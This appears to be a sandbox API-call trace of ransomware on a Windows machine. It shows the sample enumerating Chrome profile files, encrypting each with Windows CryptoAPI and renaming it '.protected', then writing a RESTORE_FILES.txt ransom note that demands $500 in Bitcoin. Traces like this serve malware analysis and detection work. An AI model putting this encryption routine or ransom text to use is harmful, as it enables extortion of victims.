wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log.protected") returned 129 [0078.457] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log" 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\000003.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\000003.log.protected")) returned 1 [0078.458] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.458] lstrcmpiW (lpString1="CURRENT", lpString2="Windows") returned -1 [0078.458] lstrcmpiW (lpString1="CURRENT", lpString2="Program Files") returned -1 [0078.458] lstrcmpiW (lpString1="CURRENT", lpString2="Program Files (x86)") returned -1 [0078.458] lstrcmpiW (lpString1="CURRENT", lpString2="$Recycle.bin") returned 1 [0078.458] lstrcmpiW (lpString1="CURRENT", lpString2="System Volume Information") returned -1 [0078.458] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT") returned 116 [0078.458] StrStrIW (lpFirst="CURRENT", lpSrch=".protected") returned 0x0 [0078.458] lstrcmpW (lpString1="CURRENT", lpString2="RESTORE_FILES.txt") returned -1 [0078.458] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.458] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.458] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\data_reduction_proxy_leveldb\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.459] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT") returned 116 [0078.459] StrStrW (lpFirst="CURRENT", lpSrch=".txt") returned 0x0 [0078.459] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT") returned 116 [0078.459] StrStrW (lpFirst="CURRENT", lpSrch=".rar") returned 0x0 [0078.459] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT") returned 116 [0078.459] StrStrW (lpFirst="CURRENT", lpSrch=".zip") returned 0x0 [0078.459] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x10, lpOverlapped=0x0) returned 1 [0078.460] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.460] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x10, lpOverlapped=0x0) returned 1 [0078.460] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.460] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.460] WriteFile (in: hFile=0x158, 
lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.460] CloseHandle (hObject=0x158) returned 1 [0078.460] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT.protected") returned 126 [0078.460] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\current"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\CURRENT.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\current.protected")) returned 1 [0078.461] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.461] lstrcmpiW (lpString1="LOCK", lpString2="Windows") returned -1 [0078.461] lstrcmpiW (lpString1="LOCK", lpString2="Program Files") returned -1 [0078.461] lstrcmpiW (lpString1="LOCK", lpString2="Program Files (x86)") returned -1 [0078.461] lstrcmpiW (lpString1="LOCK", lpString2="$Recycle.bin") returned 1 [0078.461] lstrcmpiW (lpString1="LOCK", lpString2="System Volume Information") returned -1 [0078.461] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK") returned 113 [0078.461] StrStrIW (lpFirst="LOCK", lpSrch=".protected") returned 0x0 [0078.461] lstrcmpW (lpString1="LOCK", 
lpString2="RESTORE_FILES.txt") returned -1 [0078.461] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.461] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.461] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\lock"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.461] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK") returned 113 [0078.461] StrStrW (lpFirst="LOCK", lpSrch=".txt") returned 0x0 [0078.461] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK") returned 113 [0078.461] StrStrW (lpFirst="LOCK", lpSrch=".rar") returned 0x0 [0078.461] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK") returned 113 [0078.461] StrStrW (lpFirst="LOCK", lpSrch=".zip") returned 0x0 [0078.462] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0078.462] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.462] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, 
lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0078.462] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.462] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.463] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.463] CloseHandle (hObject=0x158) returned 1 [0078.463] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK.protected") returned 123 [0078.463] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\lock"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\lock.protected")) returned 1 [0078.463] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.463] lstrcmpiW (lpString1="LOG", lpString2="Windows") returned -1 [0078.463] lstrcmpiW (lpString1="LOG", lpString2="Program Files") returned -1 [0078.463] lstrcmpiW (lpString1="LOG", lpString2="Program 
Files (x86)") returned -1 [0078.464] lstrcmpiW (lpString1="LOG", lpString2="$Recycle.bin") returned 1 [0078.464] lstrcmpiW (lpString1="LOG", lpString2="System Volume Information") returned -1 [0078.464] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG") returned 112 [0078.464] StrStrIW (lpFirst="LOG", lpSrch=".protected") returned 0x0 [0078.464] lstrcmpW (lpString1="LOG", lpString2="RESTORE_FILES.txt") returned -1 [0078.464] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.464] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.464] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.464] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG") returned 112 [0078.464] StrStrW (lpFirst="LOG", lpSrch=".txt") returned 0x0 [0078.464] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG") returned 112 [0078.464] StrStrW (lpFirst="LOG", lpSrch=".rar") returned 0x0 [0078.464] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG") returned 112 
[0078.464] StrStrW (lpFirst="LOG", lpSrch=".zip") returned 0x0 [0078.464] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0xa7, lpOverlapped=0x0) returned 1 [0078.465] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff59, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.465] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0xa7, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0xa7, lpOverlapped=0x0) returned 1 [0078.466] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.466] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.466] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.466] CloseHandle (hObject=0x158) returned 1 [0078.466] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG.protected") returned 122 [0078.466] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\data_reduction_proxy_leveldb\\LOG.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log.protected")) returned 1 [0078.467] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.467] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Windows") returned -1 [0078.467] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Program Files") returned -1 [0078.467] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Program Files (x86)") returned -1 [0078.467] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="$Recycle.bin") returned 1 [0078.467] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="System Volume Information") returned -1 [0078.467] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001") returned 124 [0078.467] StrStrIW (lpFirst="MANIFEST-000001", lpSrch=".protected") returned 0x0 [0078.467] lstrcmpW (lpString1="MANIFEST-000001", lpString2="RESTORE_FILES.txt") returned -1 [0078.467] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.467] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.467] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0x158 [0078.468] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001") returned 124 [0078.468] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".txt") returned 0x0 [0078.468] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001") returned 124 [0078.468] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".rar") returned 0x0 [0078.468] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001") returned 124 [0078.468] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".zip") returned 0x0 [0078.468] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x29, lpOverlapped=0x0) returned 1 [0078.468] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffffd7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.468] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x29, lpOverlapped=0x0) returned 1 [0078.469] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.469] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.469] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, 
lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.469] CloseHandle (hObject=0x158) returned 1 [0078.469] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001.protected") returned 134 [0078.469] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\manifest-000001"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\manifest-000001.protected")) returned 1 [0078.470] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0078.470] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0078.470] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\RESTORE_FILES.txt") returned 126 [0078.470] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0078.470] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.470] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0078.471] lstrlenA (lpString="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") returned 684 [0078.471] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) 
returned 1 [0078.471] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.471] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0078.471] CloseHandle (hObject=0x154) returned 1 [0078.471] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.471] lstrcmpiW (lpString1="Extension Rules", lpString2="Windows") returned -1 [0078.471] lstrcmpiW (lpString1="Extension Rules", lpString2="Program Files") returned -1 [0078.471] lstrcmpiW (lpString1="Extension Rules", lpString2="Program Files (x86)") returned -1 [0078.471] lstrcmpiW (lpString1="Extension Rules", lpString2="$Recycle.bin") returned 1 [0078.471] lstrcmpiW (lpString1="Extension Rules", lpString2="System Volume Information") returned -1 [0078.471] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules") returned 95 [0078.471] lstrcmpW (lpString1="Extension Rules", lpString2=".") returned 1 [0078.471] lstrcmpW (lpString1="Extension Rules", lpString2="..") returned 1 [0078.471] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\*") returned 97 [0078.471] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0078.478] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.478] 
lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.478] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.478] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.478] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.478] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\.") returned 97 [0078.478] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.478] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.478] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.478] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.478] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.478] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.478] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.478] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\..") returned 98 [0078.478] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.479] lstrcmpW (lpString1="..", lpString2="..") returned 0 